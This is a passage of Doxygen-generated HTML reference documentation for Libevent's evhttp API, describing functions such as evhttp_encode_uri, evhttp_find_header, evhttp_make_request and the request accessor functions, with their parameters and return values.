<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Makes an HTTP server stop accepting connections on the specified socket</p>
<p>This may be useful when a socket has been sent via file descriptor passing and is no longer needed by the current process.</p>
<p>If you created this bound socket with evhttp_bind_socket_with_handle or evhttp_accept_socket_with_handle, this function closes the fd you provided. If you created this bound socket with evhttp_bind_listener, this function frees the listener you provided.</p>
<p><em>bound_socket</em> is an invalid pointer after this call returns.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>a pointer to an evhttp object </td></tr>
<tr><td class="paramname">bound_socket</td><td>a handle returned by evhttp_{bind,accept}_socket_with_handle </td></tr>
</table>
</dd>
</dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a7b2e494399364cfb8071e69564c33db9">evhttp_bind_socket_with_handle()</a>, <a class="el" href="http_8h.html#ae0b17d7e600e87cadda2352ea2135d8f">evhttp_accept_socket_with_handle()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a26b24365ab036cbce853fedc7818bc49"></a><!-- doxytag: member="http.h::evhttp_del_cb" ref="a26b24365ab036cbce853fedc7818bc49" args="(struct evhttp *, const char *)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a26b24365ab036cbce853fedc7818bc49">evhttp_del_cb</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname">, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Removes the callback for a specified URI </p>
</div>
</div>
<a class="anchor" id="a2b6d14272efe8d5f6bb110666a2032fd"></a><!-- doxytag: member="http.h::evhttp_encode_uri" ref="a2b6d14272efe8d5f6bb110666a2032fd" args="(const char *str)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">char* <a class="el" href="http_8h.html#a2b6d14272efe8d5f6bb110666a2032fd">evhttp_encode_uri</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>str</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Helper function to encode a string for inclusion in a URI. All characters are replaced by their hex-escaped (%22) equivalents, except for characters explicitly unreserved by RFC3986 -- that is, ASCII alphanumeric characters, hyphen, dot, underscore, and tilde.</p>
<p>The returned string must be freed by the caller.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">str</td><td>an unencoded string </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>a newly allocated URI-encoded string or NULL on failure </dd></dl>
</div>
</div>
<a class="anchor" id="a3a36842fd6f74977c9c0fb7aa5578832"></a><!-- doxytag: member="http.h::evhttp_find_header" ref="a3a36842fd6f74977c9c0fb7aa5578832" args="(const struct evkeyvalq *headers, const char *key)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#a3a36842fd6f74977c9c0fb7aa5578832">evhttp_find_header</a> </td>
<td>(</td>
<td class="paramtype">const struct evkeyvalq * </td>
<td class="paramname"><em>headers</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>key</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Finds the value belonging to a header.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">headers</td><td>the evkeyvalq object in which to find the header </td></tr>
<tr><td class="paramname">key</td><td>the name of the header to find </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>a pointer to the value for the header or NULL if the header count not be found. </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a04e3f41c14b8e0e74da13a8d308b93b7">evhttp_add_header()</a>, <a class="el" href="http_8h.html#ab87600f14a6f8c36beedbeed8267b856">evhttp_remove_header()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a849acf0f233772b486b8057fcf3aaf4a"></a><!-- doxytag: member="http.h::evhttp_free" ref="a849acf0f233772b486b8057fcf3aaf4a" args="(struct evhttp *http)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a849acf0f233772b486b8057fcf3aaf4a">evhttp_free</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Free the previously created HTTP server.</p>
<p>Works only if no requests are currently being served.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the evhttp server object to be freed </td></tr>
</table>
</dd>
</dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http__compat_8h.html#aff4e96ef72ca014740878e3e5f02befc">evhttp_start()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="ac9318bd77cb5f4030b434bea99b3828e"></a><!-- doxytag: member="http.h::evhttp_htmlescape" ref="ac9318bd77cb5f4030b434bea99b3828e" args="(const char *html)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">char* <a class="el" href="http_8h.html#ac9318bd77cb5f4030b434bea99b3828e">evhttp_htmlescape</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>html</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Escape HTML character entities in a string.</p>
<p>Replaces <, >, ", ' and & with <, >, ", &#039; and & correspondingly.</p>
<p>The returned string needs to be freed by the caller.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">html</td><td>an unescaped HTML string </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>an escaped HTML string or NULL on error </dd></dl>
</div>
</div>
<a class="anchor" id="a70af2a5e67da78782e06c640b9f85d4e"></a><!-- doxytag: member="http.h::evhttp_make_request" ref="a70af2a5e67da78782e06c640b9f85d4e" args="(struct evhttp_connection *evcon, struct evhttp_request *req, enum evhttp_cmd_type type, const char *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a70af2a5e67da78782e06c640b9f85d4e">evhttp_make_request</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td>
<td class="paramname"><em>evcon</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">enum <a class="el" href="http_8h.html#ac858319d667267f9fc848c2bb6931aa3">evhttp_cmd_type</a> </td>
<td class="paramname"><em>type</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>uri</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Make an HTTP request over the specified connection.</p>
<p>The connection gets ownership of the request. On failure, the request object is no longer valid as it has been freed.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">evcon</td><td>the <a class="el" href="structevhttp__connection.html">evhttp_connection</a> object over which to send the request </td></tr>
<tr><td class="paramname">req</td><td>the previously created and configured request object </td></tr>
<tr><td class="paramname">type</td><td>the request type EVHTTP_REQ_GET, EVHTTP_REQ_POST, etc. </td></tr>
<tr><td class="paramname">uri</td><td>the URI associated with the request </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 on failure </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#ab323fe297168f0f87af832f2bddc40a0">evhttp_cancel_request()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="ab8c84271a97fd85957cf72b1161b8216"></a><!-- doxytag: member="http.h::evhttp_new" ref="ab8c84271a97fd85957cf72b1161b8216" args="(struct event_base *base)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp.html">evhttp</a>* <a class="el" href="http_8h.html#ab8c84271a97fd85957cf72b1161b8216">evhttp_new</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevent__base.html">event_base</a> * </td>
<td class="paramname"><em>base</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Create a new HTTP server.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">base</td><td>(optional) the event base to receive the HTTP events </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>a pointer to a newly initialized evhttp server structure </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a849acf0f233772b486b8057fcf3aaf4a">evhttp_free()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a12d3940d23fb53c38106f8ac0d3dfff6"></a><!-- doxytag: member="http.h::evhttp_parse_query" ref="a12d3940d23fb53c38106f8ac0d3dfff6" args="(const char *uri, struct evkeyvalq *headers)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a12d3940d23fb53c38106f8ac0d3dfff6">evhttp_parse_query</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct evkeyvalq * </td>
<td class="paramname"><em>headers</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Helper function to parse out arguments in a query.</p>
<p>Parsing a URI like</p>
<p><a href="http://foo.com/?q=test&s=some+thing">http://foo.com/?q=test&s=some+thing</a></p>
<p>will result in two entries in the key value queue.</p>
<p>The first entry is: key="q", value="test" The second entry is: key="s", value="some thing"</p>
<dl class="deprecated"><dt><b><a class="el" href="deprecated.html#_deprecated000035">Deprecated:</a></b></dt><dd>This function is deprecated as of Libevent 2.0.9. Use evhttp_uri_parse and evhttp_parse_query_str instead.</dd></dl>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">uri</td><td>the request URI </td></tr>
<tr><td class="paramname">headers</td><td>the head of the evkeyval queue </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 on failure </dd></dl>
</div>
</div>
<a class="anchor" id="a1598fb5757f39dde6dc43dee9a2e7fca"></a><!-- doxytag: member="http.h::evhttp_parse_query_str" ref="a1598fb5757f39dde6dc43dee9a2e7fca" args="(const char *uri, struct evkeyvalq *headers)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a1598fb5757f39dde6dc43dee9a2e7fca">evhttp_parse_query_str</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct evkeyvalq * </td>
<td class="paramname"><em>headers</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Helper function to parse out arguments from the query portion of an HTTP URI.</p>
<p>Parsing a query string like</p>
<p>q=test&s=some+thing</p>
<p>will result in two entries in the key value queue.</p>
<p>The first entry is: key="q", value="test" The second entry is: key="s", value="some thing"</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">query_parse</td><td>the query portion of the URI </td></tr>
<tr><td class="paramname">headers</td><td>the head of the evkeyval queue </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 on failure </dd></dl>
</div>
</div>
<a class="anchor" id="ab87600f14a6f8c36beedbeed8267b856"></a><!-- doxytag: member="http.h::evhttp_remove_header" ref="ab87600f14a6f8c36beedbeed8267b856" args="(struct evkeyvalq *headers, const char *key)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#ab87600f14a6f8c36beedbeed8267b856">evhttp_remove_header</a> </td>
<td>(</td>
<td class="paramtype">struct evkeyvalq * </td>
<td class="paramname"><em>headers</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>key</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Removes a header from a list of existing headers.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">headers</td><td>the evkeyvalq object from which to remove a header </td></tr>
<tr><td class="paramname">key</td><td>the name of the header to remove </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 if the header was removed, -1 otherwise. </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a3a36842fd6f74977c9c0fb7aa5578832">evhttp_find_header()</a>, <a class="el" href="http_8h.html#a04e3f41c14b8e0e74da13a8d308b93b7">evhttp_add_header()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a88fe4c5507e88c4db284ea30a0478e5d"></a><!-- doxytag: member="http.h::evhttp_remove_server_alias" ref="a88fe4c5507e88c4db284ea30a0478e5d" args="(struct evhttp *http, const char *alias)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a88fe4c5507e88c4db284ea30a0478e5d">evhttp_remove_server_alias</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>alias</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Remove a server alias from an http object.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the evhttp object </td></tr>
<tr><td class="paramname">alias</td><td>the alias to remove </td></tr>
</table>
</dd>
</dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a58fe001925e7f65d7678bf90b31fc2a5">evhttp_add_server_alias()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="ab2eb1ac82f36e7f0180b18d4553d3994"></a><!-- doxytag: member="http.h::evhttp_remove_virtual_host" ref="ab2eb1ac82f36e7f0180b18d4553d3994" args="(struct evhttp *http, struct evhttp *vhost)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#ab2eb1ac82f36e7f0180b18d4553d3994">evhttp_remove_virtual_host</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>vhost</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Removes a virtual host from the http server.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the evhttp object from which to remove the virtual host </td></tr>
<tr><td class="paramname">vhost</td><td>the virtual host to remove from the regular http server. </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 on failure </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a82d8fb72c5e8c76b787987ba5de5b141">evhttp_add_virtual_host()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="aad0392c873fa034be3ff09d4f8b68aba"></a><!-- doxytag: member="http.h::evhttp_request_free" ref="aad0392c873fa034be3ff09d4f8b68aba" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#aad0392c873fa034be3ff09d4f8b68aba">evhttp_request_free</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Frees the request object and removes associated events. </p>
</div>
</div>
<a class="anchor" id="a552bcfe23acec6858742e44a1b932dad"></a><!-- doxytag: member="http.h::evhttp_request_get_command" ref="a552bcfe23acec6858742e44a1b932dad" args="(const struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">enum <a class="el" href="http_8h.html#ac858319d667267f9fc848c2bb6931aa3">evhttp_cmd_type</a> <a class="el" href="http_8h.html#a552bcfe23acec6858742e44a1b932dad">evhttp_request_get_command</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the request command </p>
</div>
</div>
<a class="anchor" id="a92a534f00172fa452c45c9f3fc42d6f5"></a><!-- doxytag: member="http.h::evhttp_request_get_connection" ref="a92a534f00172fa452c45c9f3fc42d6f5" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a>* <a class="el" href="http_8h.html#a92a534f00172fa452c45c9f3fc42d6f5">evhttp_request_get_connection</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the connection object associated with the request or NULL</p>
<p>The user needs to either free the request explicitly or call <a class="el" href="http_8h.html#a77024706313626c5857089b08ec5e0ae">evhttp_send_reply_end()</a>. </p>
</div>
</div>
<a class="anchor" id="a4cc0812787263e4473b2bd25fcade9c2"></a><!-- doxytag: member="http.h::evhttp_request_get_evhttp_uri" ref="a4cc0812787263e4473b2bd25fcade9c2" args="(const struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a>* <a class="el" href="http_8h.html#a4cc0812787263e4473b2bd25fcade9c2">evhttp_request_get_evhttp_uri</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the request URI (parsed) </p>
</div>
</div>
<a class="anchor" id="aac84865e4848b8d9089e4182e12d185e"></a><!-- doxytag: member="http.h::evhttp_request_get_host" ref="aac84865e4848b8d9089e4182e12d185e" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#aac84865e4848b8d9089e4182e12d185e">evhttp_request_get_host</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the host associated with the request. If a client sends an absolute URI, the host part of that is preferred. Otherwise, the input headers are searched for a Host: header. NULL is returned if no absolute URI or Host: header is provided. </p>
</div>
</div>
<a class="anchor" id="aa939f28c8da2a8122097de23c7670321"></a><!-- doxytag: member="http.h::evhttp_request_get_input_buffer" ref="aa939f28c8da2a8122097de23c7670321" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevbuffer.html">evbuffer</a>* <a class="el" href="http_8h.html#aa939f28c8da2a8122097de23c7670321">evhttp_request_get_input_buffer</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the input buffer </p>
</div>
</div>
<a class="anchor" id="a034fca99ce0cc5ff3b7f56744915a8be"></a><!-- doxytag: member="http.h::evhttp_request_get_input_headers" ref="a034fca99ce0cc5ff3b7f56744915a8be" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct evkeyvalq* <a class="el" href="http_8h.html#a034fca99ce0cc5ff3b7f56744915a8be">evhttp_request_get_input_headers</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the input headers </p>
</div>
</div>
<a class="anchor" id="a8dc23de32b242457db98ab566c53f71f"></a><!-- doxytag: member="http.h::evhttp_request_get_output_buffer" ref="a8dc23de32b242457db98ab566c53f71f" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevbuffer.html">evbuffer</a>* <a class="el" href="http_8h.html#a8dc23de32b242457db98ab566c53f71f">evhttp_request_get_output_buffer</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the output buffer </p>
</div>
</div>
<a class="anchor" id="ae1321a89525b6336fce624e28de41b49"></a><!-- doxytag: member="http.h::evhttp_request_get_output_headers" ref="ae1321a89525b6336fce624e28de41b49" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct evkeyvalq* <a class="el" href="http_8h.html#ae1321a89525b6336fce624e28de41b49">evhttp_request_get_output_headers</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the output headers </p>
</div>
</div>
<a class="anchor" id="a78ce0bb30083afddb525cb9fa0b30ae0"></a><!-- doxytag: member="http.h::evhttp_request_get_uri" ref="a78ce0bb30083afddb525cb9fa0b30ae0" args="(const struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#a78ce0bb30083afddb525cb9fa0b30ae0">evhttp_request_get_uri</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns the request URI </p>
</div>
</div>
<a class="anchor" id="a25516c0fb1b0ef47c81f623da3782bd1"></a><!-- doxytag: member="http.h::evhttp_request_is_owned" ref="a25516c0fb1b0ef47c81f623da3782bd1" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a25516c0fb1b0ef47c81f623da3782bd1">evhttp_request_is_owned</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Returns 1 if the request is owned by the user </p>
</div>
</div>
<a class="anchor" id="a2f40f147e37f9a40f8ef684fb8f2d6b0"></a><!-- doxytag: member="http.h::evhttp_request_new" ref="a2f40f147e37f9a40f8ef684fb8f2d6b0" args="(void(*cb)(struct evhttp_request *, void *), void *arg)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__request.html">evhttp_request</a>* <a class="el" href="http_8h.html#a2f40f147e37f9a40f8ef684fb8f2d6b0">evhttp_request_new</a> </td>
<td>(</td>
<td class="paramtype">void(*)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *) </td>
<td class="paramname"><em>cb</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void * </td>
<td class="paramname"><em>arg</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Creates a new request object that needs to be filled in with the request parameters. The callback is executed when the request completed or an error occurred. </p>
</div>
</div>
<a class="anchor" id="a93a13d12f579bf22af35e2f1a6d82f4c"></a><!-- doxytag: member="http.h::evhttp_request_own" ref="a93a13d12f579bf22af35e2f1a6d82f4c" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a93a13d12f579bf22af35e2f1a6d82f4c">evhttp_request_own</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Takes ownership of the request object</p>
<p>Can be used in a request callback to keep onto the request until <a class="el" href="http_8h.html#aad0392c873fa034be3ff09d4f8b68aba">evhttp_request_free()</a> is explicitly called by the user. </p>
</div>
</div>
<a class="anchor" id="a3dd375d81eac9baabc53749ed025ec12"></a><!-- doxytag: member="http.h::evhttp_request_set_chunked_cb" ref="a3dd375d81eac9baabc53749ed025ec12" args="(struct evhttp_request *, void(*cb)(struct evhttp_request *, void *))" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a3dd375d81eac9baabc53749ed025ec12">evhttp_request_set_chunked_cb</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname">, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void(*)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *) </td>
<td class="paramname"><em>cb</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Enable delivery of chunks to requestor. </p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">cb</td><td>will be called after every read of data with the same argument as the completion callback. Will never be called on an empty response. May drain the input buffer; it will be drained automatically on return. </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a629ef7f70ed916e162dee3bd12e397c9"></a><!-- doxytag: member="http.h::evhttp_send_error" ref="a629ef7f70ed916e162dee3bd12e397c9" args="(struct evhttp_request *req, int error, const char *reason)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a629ef7f70ed916e162dee3bd12e397c9">evhttp_send_error</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>error</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>reason</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Send an HTML error message to the client.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">req</td><td>a request object </td></tr>
<tr><td class="paramname">error</td><td>the HTTP error code </td></tr>
<tr><td class="paramname">reason</td><td>a brief explanation of the error. If this is NULL, we'll just use the standard meaning of the error code. </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a9df5ec9adc9bc664db5d6b161a293525"></a><!-- doxytag: member="http.h::evhttp_send_reply" ref="a9df5ec9adc9bc664db5d6b161a293525" args="(struct evhttp_request *req, int code, const char *reason, struct evbuffer *databuf)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a9df5ec9adc9bc664db5d6b161a293525">evhttp_send_reply</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>code</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>reason</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
